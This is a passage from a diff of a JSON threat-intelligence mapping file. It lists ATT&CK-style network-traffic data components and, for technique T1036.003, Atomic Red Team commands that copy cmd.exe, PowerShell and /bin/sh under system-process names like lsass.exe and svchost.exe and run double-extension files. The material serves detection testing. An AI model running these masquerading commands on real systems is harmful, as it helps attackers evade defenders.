This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + null + ] + }, + { + "technique_id": "T1036.003", + "command_list": [ + "copy %SystemRoot%\\System32\\cmd.exe %SystemRoot%\\Temp\\lsass.exe\n%SystemRoot%\\Temp\\lsass.exe /B\n", + "cp /bin/sh /tmp/crond;\necho 'sleep 5' | /tmp/crond\n", + "copy %SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y\ncmd.exe /c %APPDATA%\\notepad.exe /B\n", + "copy %SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y\ncmd.exe /c %APPDATA%\\svchost.exe /B\n", + "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y\ncmd.exe /K %APPDATA%\\taskhostw.exe\n", + "copy #{inputfile} ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", + "copy PathToAtomicsFolder\\T1036.003\\bin\\T1036.003.exe #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "copy $env:ComSpec #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "copy C:\\Windows\\System32\\cmd.exe C:\\lsm.exe\nC:\\lsm.exe /c echo T1036.003 > C:\\T1036.003.txt\n", + "copy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy C:\\Windows\\System32\\calc.exe 
%temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 
/Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n" + ], + "commands": [ + { + "command": "copy %SystemRoot%\\System32\\cmd.exe %SystemRoot%\\Temp\\lsass.exe\n%SystemRoot%\\Temp\\lsass.exe /B\n", + 
"source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "cp /bin/sh /tmp/crond;\necho 'sleep 5' | /tmp/crond\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy %SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y\ncmd.exe /c %APPDATA%\\notepad.exe /B\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy %SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y\ncmd.exe /c %APPDATA%\\svchost.exe /B\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y\ncmd.exe /K %APPDATA%\\taskhostw.exe\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy #{inputfile} ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy PathToAtomicsFolder\\T1036.003\\bin\\T1036.003.exe #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy $env:ComSpec #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename 
System Utilities" + }, + { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\lsm.exe\nC:\\lsm.exe /c echo T1036.003 > C:\\T1036.003.txt\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs 
